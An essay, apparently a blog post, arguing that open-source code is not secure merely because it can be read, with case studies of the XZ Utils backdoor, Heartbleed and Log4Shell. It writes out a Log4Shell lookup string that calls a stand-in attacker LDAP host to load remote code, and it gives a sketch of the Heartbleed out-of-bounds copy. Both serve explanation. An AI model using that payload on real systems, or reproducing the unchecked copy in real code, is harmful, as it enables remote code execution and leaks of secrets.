Open source advocates, and many security professionals, often say things like “open source software is secure because you can just read the code”.
This argument assumes that the ability to read source code translates directly into the ability to understand, verify, and trust it: you can see which files the software opens, which network sockets it listens on, what kind of data it sends, and what cryptography it uses.
This is usually contrasted with proprietary software, which is delivered only as an executable. Executables contain no human-readable source code; they are optimised machine instructions produced during compilation, often with additional obfuscation. So the intuition is simple: proprietary software hides its logic, while open source software exposes it.
“Just read it, bro”
Access to source code is not the same as the ability to meaningfully audit it. Modern software systems are enormous, interconnected, and often deeply complex. Understanding them requires specialised knowledge, extensive tooling, and a significant time investment, none of which most users have. Even security professionals rarely audit entire projects from scratch.
There are two basic reasons why this argument makes no sense: the personal time investment it demands, and the way it deflects that investment onto someone else.
Source available doesn’t mean you can read it
“If you don’t trust the source code, you can just audit it yourself” is an argument I see open-source advocates use far too often. This has to stop.
The people using this argument have probably never audited a significant, meaningful project; think of Linux, PulseAudio, Nginx, Dovecot, or Firefox. And, to be honest, that’s fine. Auditing a codebase is a costly endeavour that requires a team of dedicated professionals with years of experience and a multitude of tools. Just “reading” the source code is not enough.
The mere availability of source code is indeed a significant advantage, but reading it is not the only way to audit software. In professional security assessments, static source review is far less common than dynamic testing, fuzzing, or reverse engineering.
Source available also doesn’t mean people will just audit it in their free time
I deliberately used the phrase “source available” to avoid confusion between free software, open source software, and software with open-source parts. For this topic, the public availability of the source code is all that matters, not the licensing terms.
Even if the source code is one git clone away, that does not mean anyone will actually read it. At best, a handful of particularly motivated users might skim a few files that look interesting. But a meaningful security review requires following data flows, understanding the architecture, and reasoning about edge cases and failure modes. That is hard work that could take an experienced professional weeks or months. It’s not just a casual evening activity.
Most users, including developers, install software to solve a problem, not to perform unpaid security audits. They trust package managers, distributions, corporate reputation, or “what everyone else is using”. Even highly skilled security professionals do not have the time to audit every library, dependency, and tool they rely on. In a modern stack with hundreds or thousands of transitive dependencies, the idea that “people will just read the code” is not realistic.
There is also a problem of diffusion of responsibility. When millions of users depend on a project, each one can assume that “surely someone more qualified has already looked at this”. In practice, critical infrastructure is often maintained by one or two overworked volunteers, with no dedicated security team and no formal review process. The number of people with the experience and skills to audit code is small, and the number who will audit an entire codebase for free is practically zero.
Reproducible builds
Source availability creates the possibility of independent audits, but even when someone does audit the source, that still leaves open a separate question: how do you know the binary you are actually running was built from that audited code? That is where concerns like reproducible builds, compilers, firmware, and supply-chain attacks start to matter.
A reproducible build is one where, given the same source code and defined build inputs, independent parties can run the build process and obtain bit‑for‑bit identical binaries. If two people build the same version of the software on their own machines, they should get the same output. Only then can you compare your binary to a known‑good one and have any confidence that nothing was swapped or tampered with in between.
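To make “bit‑for‑bit identical” concrete, here is a tiny C sketch of my own (in practice you would simply compare checksums with something like sha256sum) that reports whether two independently built binaries contain exactly the same bytes:

```c
/* Minimal sketch: check whether two independently built binaries are
 * bit-for-bit identical, the property reproducible builds aim for.
 * In practice you would normally just compare checksums instead. */
#include <stdio.h>

static int files_identical(const char *path_a, const char *path_b) {
    FILE *a = fopen(path_a, "rb");
    FILE *b = fopen(path_b, "rb");
    int identical = (a != NULL && b != NULL);

    while (identical) {
        int ca = fgetc(a);
        int cb = fgetc(b);
        if (ca != cb)
            identical = 0;              /* differing byte or differing length */
        if (ca == EOF || cb == EOF)
            break;                      /* reached the end of at least one file */
    }

    if (a) fclose(a);
    if (b) fclose(b);
    return identical;
}

int main(int argc, char **argv) {
    if (argc != 3) {
        fprintf(stderr, "usage: %s <binary-a> <binary-b>\n", argv[0]);
        return 2;
    }
    puts(files_identical(argv[1], argv[2]) ? "bit-for-bit identical" : "different");
    return 0;
}
```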
In practice, most software is not reproducible by default. Builds often depend on details of the environment that change from one machine or one moment to the next. Some usual sources of non‑reproducibility include:
- Timestamps embedded into binaries, logs, or version strings (__DATE__, __TIME__, “built on 2025‑11‑30”), as in the short C sketch after this list.
- Absolute paths and usernames compiled into debug info or error messages (/home/alice/build/…).
- Random identifiers or UUIDs generated during the build.
- Non-deterministic ordering of files or symbols (e.g., relying on filesystem or hash map iteration order).
- Differences in locales and environments, such as sorting, decimal separators, or environment variables.
- Toolchain and dependency differences, where a slightly different compiler, linker, or library produces slightly different output.
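To make the first two points concrete, here is a deliberately small C example, written for this post rather than taken from any real project, that bakes build‑environment details straight into the binary:

```c
/* Deliberately small example: every compilation bakes different
 * build-environment details into the binary, so two otherwise identical
 * builds will not be bit-for-bit identical. */
#include <stdio.h>

int main(void) {
    /* __DATE__ and __TIME__ expand to the moment of compilation,
     * so they change on every build. */
    printf("Built on %s at %s\n", __DATE__, __TIME__);

    /* Depending on how the compiler is invoked, __FILE__ can expand to an
     * absolute path such as /home/alice/build/main.c, leaking the builder's
     * username and directory layout into the binary. */
    printf("Compiled from %s\n", __FILE__);
    return 0;
}
```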
None of this is malicious; it’s just how traditional build systems evolved. For decades, nobody cared whether two builds were bit‑identical. Developers got accustomed to embedding dates, hostnames, and custom flags because they were convenient for debugging or support, and build tools freely consumed whatever happened to be in the environment. Over time, though, the question of build reproducibility arose: if I compile the same source code on two identical machines and they produce different binaries, how can I know the toolchain didn’t tamper with anything along the way?
Making builds reproducible means systematically removing or controlling all these hidden sources of variation. That typically involves:
- Freezing the environment: pinning compiler and dependency versions, and building in a controlled, isolated environment (containers, chroots, Nix/Guix‑style systems, etc.).
- Normalising time and paths: replacing “current time” with a fixed build timestamp, and stripping or standardising absolute paths and usernames (for example, via a shared SOURCE_DATE_EPOCH, as in the sketch after this list).
- Eliminating non-deterministic order: using stable sorting, fixed iteration orders, and deterministic archive/packaging tools.
- Avoiding random data at build time: you can generate random data on the first run of the application, or seed randomness with a fixed, documented value.
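As a sketch of the “normalising time and paths” point, a build step can honour the SOURCE_DATE_EPOCH convention from the Reproducible Builds project: when the variable is set, it replaces the wall clock, so every rebuild embeds the same timestamp. The helper below is my own illustration, not code from any particular build system:

```c
/* Sketch of a build step that emits a timestamp reproducibly: honour
 * SOURCE_DATE_EPOCH (a Unix timestamp in an environment variable) when it
 * is set, and only fall back to the wall clock otherwise. */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main(void) {
    time_t build_time;
    const char *sde = getenv("SOURCE_DATE_EPOCH");

    if (sde != NULL)
        build_time = (time_t)strtoll(sde, NULL, 10); /* pinned, reproducible */
    else
        build_time = time(NULL);                     /* varies on every build */

    /* Format in UTC so the result does not depend on the builder's timezone. */
    char buf[32];
    struct tm tm_utc;
    gmtime_r(&build_time, &tm_utc);
    strftime(buf, sizeof buf, "%Y-%m-%dT%H:%M:%SZ", &tm_utc);

    /* A build script would typically redirect this into a generated header. */
    printf("#define BUILD_DATE \"%s\"\n", buf);
    return 0;
}
```

Run it twice with SOURCE_DATE_EPOCH=1700000000 and the output is identical; run it without the variable and it changes on every build.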
Once a project adopts these practices, different people can independently build the same source and verify that they get identical binaries. That doesn’t solve every problem; you still have to worry about compilers, firmware, and the rest of the toolchain, but it at least closes a critical gap between “I audited this code” and “I trust this binary.”
Did you audit your compiler? Did you audit your operating system? Did you audit your disk’s firmware?
Source code cannot do anything on its own. If it’s an interpreted language (Ruby, Python, JavaScript, etc.), you need an interpreter. If it’s a compiled language (Go, C, C++, Rust, etc.), you need a compiler and possibly some external libraries.
You also need an operating system to run your development tools, and dozens of peripherals, storage controllers, memory subsystems and network interfaces, along with their corresponding firmware. Together, they form what security researchers call the trusted computing base: every piece of software and hardware that must be correct for the final program to behave as intended.
Once you start thinking in terms of the trusted computing base, you realise that the behaviour of the final binary depends on far more than the lines of source code you reviewed. The compiler, the standard library, the kernel, the dynamic linker, the CPU microcode, the disk controller firmware, and countless other factors all influence the machine code that ultimately runs.
Each of those layers introduces additional factors and complexity into the process of auditing a binary…
Walled gardens (like Signal)
Some software projects publish their source code but still operate as walled gardens.
Signal is one of the best-known examples. The client and server are open source, but Signal is a non-federated messaging platform. You can run your own server, but doing so would isolate you from everyone on the official network: your contacts would have to register on your server to message you, and would then be unable to chat with other Signal users.
Drew DeVault goes into more detail on this topic in his post [archived version].
You can read the server source code, but you cannot meaningfully verify that Signal.org is running that code, nor can you choose to run an alternative implementation without losing access to the network.
In addition, Moxie Marlinspike, the creator of Signal, doesn’t actually like third-party forks using the official Signal server [archived version].
While Signal offers reproducible builds [archived version], this does nothing to address the fact that you cannot verify or independently operate the server you are forced to trust.
This also places a significant burden of trust on the Signal maintainers, who could become targets of bribery or coercion into shipping targeted backdoors, especially against Signal users who download the application from the Google or Apple app stores.
Supply chain attacks
In this post, I’ve explained why it’s unrealistic for anyone to audit every line of every open-source project.
I would also like to talk about something else: supply chain attacks.
A “supply chain attack” is the cybersecurity term for an attack in which an application is compromised through a vulnerable or malicious dependency. Most software is not written from scratch: highly complex applications are assembled from common utilities that handle DNS resolution, compression, JSON parsing, network traffic, HTML rendering, and even distributed computing. Due to the nature of software engineering, supply chain attacks are becoming more frequent over time: the more complex a piece of software is, the more likely it is to depend on something vulnerable.
Actually, as Ariadne points out [archived version], the software supply chain is not real:
For there to be a “supply chain”, there must be a supplier, which in turn requires a contractual relationship between two parties. With software licensed under FOSS licensing terms, a consumer receives a non-exclusive license to make use of the software however they wish (in accordance with the license requirements, of course), but non-exclusive licenses cannot and do not imply a contractual supplier-consumer relationship.
However, since “software supply chain” is the industry-agreed term, I will use it in this section to describe some of the most famous cybersecurity incidents in recent history that involved it.
The Jia Tan case (the XZ Utils backdoor)
XZ Utils is a widely used compression library (xz / liblzma) that ships with most Linux distributions. In early 2024, it was discovered that a maintainer account using the name “Jia Tan” had slipped a highly obfuscated backdoor into XZ Utils. Fortunately, the attack was caught in time by Andres Freund, a Microsoft engineer who noticed unusually slow SSH logins while doing unrelated performance benchmarking.
Mr Freund was using a development version of Debian Linux and noticed that establishing SSH connections was slow. Instead of ignoring this, he used Valgrind to debug the OpenSSH process and noticed that something odd was going on with function calls, which he traced back to liblzma (part of XZ Utils).
The most dramatic part of this story is that OpenSSH does not depend on XZ Utils at all. The backdoor exploited an obscure dependency path through systemd: some distribution builds of OpenSSH link against libsystemd, which in turn depends on liblzma. This allowed the malicious library to override a cryptographic function used during authentication and accept attacker-provided SSH keys that would otherwise be rejected.
Had it shipped widely, this backdoor would have given anyone holding the attacker’s private key access to every single OpenSSH server in the world running the vulnerable library.
This neatly illustrates the limits of “just read the source code”. XZ Utils is open source, but the backdoor evaded detection by both users and maintainers.
Jia Tan spent around two years building trust as a “good contributor”: they submitted normal-looking patches, fixed bugs, and responded to reviews. Meanwhile, Lasse Collin, the sole maintainer of XZ Utils, was exhausted and grateful to have a “helpful” new co-maintainer to share the load.
The backdoor was not present in the C source code of the public git repository. It was injected only into the release tarballs that Jia Tan, acting as a maintainer, personally generated and published. Those tarballs contained a modified M4 build macro that did not exist in the public source tree and that, during the build, extracted a hidden binary payload from obfuscated test files and compiled the malicious code into liblzma.
Chronically underfunded volunteer-run enterprise software (OpenSSL and Heartbleed)
In this case, OpenSSL was not the victim of a supply-chain attack; rather, it was the supply chain for tens of millions of devices that rely on cryptography, from cars that use cryptographically signed firmware updates to smart TVs, smartphones, and enterprise hardware such as firewall appliances and network security cameras. All of these devices, and millions more, use a cryptographic library known as OpenSSL, maintained by the OpenSSL project. We are talking about tens of billions of dollars of infrastructure built on a single open-source project.
OpenSSL is a free, open-source and extremely popular cryptographic library. It implements TLS/SSL, handles X.509 certificates, performs low-level cryptography, and provides some of the most fundamental security primitives on which modern computing relies. It is, in many ways, part of the bedrock of the Internet.
And yet, for years, OpenSSL ran on a shoestring budget. Before 2014, the entire project received roughly $2,000 per year in donations. Its development was led primarily by one full-time developer, assisted by a handful of volunteers. This combination of massive responsibility and minimal resourcing created an environment where mistakes were not unlikely; they were inevitable.
Heartbleed (CVE-2014-0160) was one of those mistakes, and it was catastrophic.
The vulnerability was introduced by a seemingly harmless patch: an implementation of the TLS heartbeat extension in December 2011. The issue was a missing bounds check: a client could claim that a heartbeat message contained a payload of a certain length, while actually sending a much smaller payload. OpenSSL would allocate a buffer based on the claimed length and then copy that many bytes from memory, returning, along with the attacker’s one-byte payload, up to 64 KB of whatever happened to be in memory: private keys, session cookies, credentials or internal data structures.
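The bug is easier to see in code. The following is a heavily simplified sketch of the pattern, written for this post rather than lifted from OpenSSL: the length used for the copy comes from the attacker, while the data actually received is much smaller.

```c
/* Heavily simplified illustration of the Heartbleed pattern; this is NOT
 * the actual OpenSSL code. `claimed_len` comes from the attacker's heartbeat
 * message, while only `actual_len` bytes of payload were really received. */
#include <stdlib.h>
#include <string.h>

unsigned char *build_heartbeat_response(const unsigned char *received_payload,
                                        size_t claimed_len,
                                        size_t actual_len) {
    unsigned char *response = malloc(claimed_len);
    if (response == NULL)
        return NULL;

    /* BUG: trusts the attacker-supplied length. If claimed_len > actual_len,
     * this reads past the end of the received data and copies adjacent heap
     * memory (private keys, session cookies, credentials) into the response. */
    memcpy(response, received_payload, claimed_len);

    /* The fix shipped in OpenSSL 1.0.1g amounts to a bounds check along
     * these lines: if (claimed_len > actual_len) discard the message. */
    (void)actual_len; /* only referenced by the missing check described above */
    return response;
}
```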
The first vulnerable release, version 1.0.1, was published on 14th March 2012. The fix arrived with OpenSSL 1.0.1g on 7th April 2014, more than two years later.
OpenSSL’s source code was, and remains, fully available. Anyone could have audited it. But few organisations stepped up, and even fewer were willing to fund full-time maintainers to keep it healthy.
When Heartbleed became public, companies poured money into emergency response, but not into sustained long-term support. It was only after the incident that the Linux Foundation launched the Core Infrastructure Initiative, explicitly acknowledging that critical open-source software cannot survive on volunteer labour alone.
The Risks of Deeply Embedded Dependencies (Log4Shell)
Log4j is a widely used Java logging library that sits at the bottom of countless Java applications, including popular ones such as Apache Kafka, Elasticsearch, and Minecraft.
Log4j has a feature called lookups: ${...} expressions in log patterns that are evaluated at runtime. One of those lookup types used the Java Naming and Directory Interface (JNDI), which can talk to directory services like LDAP.
Log4Shell was the name given to a vulnerability in this mechanism. If an attacker could cause a string like ${jndi:ldap://attacker.example.com/a} to appear in any logged field, Log4j’s JndiLookup handler would try to resolve the expression, directing the application to contact a malicious LDAP server that could respond with attacker-controlled Java bytecode, which the application would then load. In many cases, this led directly to full remote code execution.
This vulnerability earned a CVSS score of 10 (the highest possible) due to its trivial exploitation path, the ubiquity of Log4j, and the catastrophic consequences of triggering it. It remains one of the clearest examples of how a deeply embedded dependency can compromise innumerable pieces of software, despite the source code being open to everyone.
Corporate profits above contributing to FOSS
Another often-overlooked reality is that many giant corporations reap enormous benefits from open-source software without contributing back, as illustrated by several high-profile examples:
FFmpeg: pay us or stop reporting bugs
FFmpeg, the world’s most famous multimedia library, is used everywhere from streaming services to smartphones, and a small group of unpaid developers maintains it.
A recent dispute [archived version] between the FFmpeg team and Google has started a conversation about Google’s practice of reporting bugs in popular open-source tools. Google’s AI-driven tooling was finding and reporting vulnerabilities in the library, but Google was not providing the resources to fix them. Google spends millions of dollars on security research and bug hunting, yet contributes next to nothing back to the open-source projects it scrutinises.
FFmpeg asserts that security researchers should accompany vulnerability reports with patches or funding. Otherwise, they become a burden on already overstretched volunteers.
Apple and BSD
Apple’s macOS and iOS (the latter of which started as a variant of OS X, the previous name for macOS) are built on an open-source BSD Unix core.
The BSD licensing terms allow Apple to use this operating system as the base for a proprietary, highly profitable product without any requirement to contribute back. Apple was the first company to reach a trillion-dollar market capitalisation, yet in 2025 it donated less than 500 USD to the FreeBSD Foundation, which supports the BSD project that made Apple’s operating systems possible.
Over the years, Apple has built a range of robust security features on top of its BSD-derived foundation, including Gatekeeper, notarised applications, System Integrity Protection (SIP), the Secure Enclave, Kernel Address Space Layout Randomisation (KASLR), app sandboxing, and more.
These are significant security innovations, but Apple developed and shipped them only for its proprietary products and never contributed them back to BSD. In essence, FreeBSD made macOS possible; Apple leveraged its open-source nature while keeping the most significant engineering achievements proprietary.
Deprecating the Nginx Ingress Controller
In 2025 [archived version], the Kubernetes maintainers made the shocking decision to retire one of the most popular open-source ingress controllers available: the Nginx Ingress Controller.
Yet, despite its widespread adoption, the Nginx Ingress Controller (or Ingress NGINX) project had only one or two people doing development work on their own time, after work hours, and sometimes on weekends.
In early 2025, security researchers discovered critical flaws in Ingress NGINX that could allow complete cluster takeover [archived version]. Over 6,000 Internet-exposed deployments were found to be vulnerable. But rather than increasing support, the Kubernetes maintainers decided it wasn’t worth the risk and effort to keep the project alive.
Once again, the lesson is clear: critical open-source infrastructure used by thousands of corporations can be built and maintained by a handful of unpaid contributors, until it becomes too much. Then it’s deprecated, not resourced.
Conclusion
This post has taken a critical view of open-source security. Not because open source is inherently less secure than proprietary software, but because the usual arguments in its defence are often incomplete. Open source is invaluable, and the ability to inspect source code is essential in high-security environments. But this benefit only emerges if the code is actually reviewed, ideally by multiple independent teams with the expertise and time to do it properly.
Open source can be more secure than closed source, but openness does not automatically grant security. In some scenarios, the dynamics of volunteer maintainership, complex dependency chains, and informal release processes can make open-source projects more vulnerable to certain attack classes. The XZ Utils backdoor is one of these examples: the attack succeeded not because the code was visible, but because no one was looking.
By contrast, a supply-chain compromise like the Jia Tan case is far less likely (or even outright impossible) in an environment of proprietary software developed entirely in-house by a tightly controlled team; the “trusted volunteer” attack path simply does not exist.
However, proprietary software also has its own risks: insider threats, opaque codebases, and vulnerabilities that may remain undiscovered for years because no one outside the vendor can audit them.
At the end of the day, security comes from scrutiny, resources, discipline, and the complex and invaluable work of people who actually read, test, and verify the systems we depend on, and not from the release model of the software.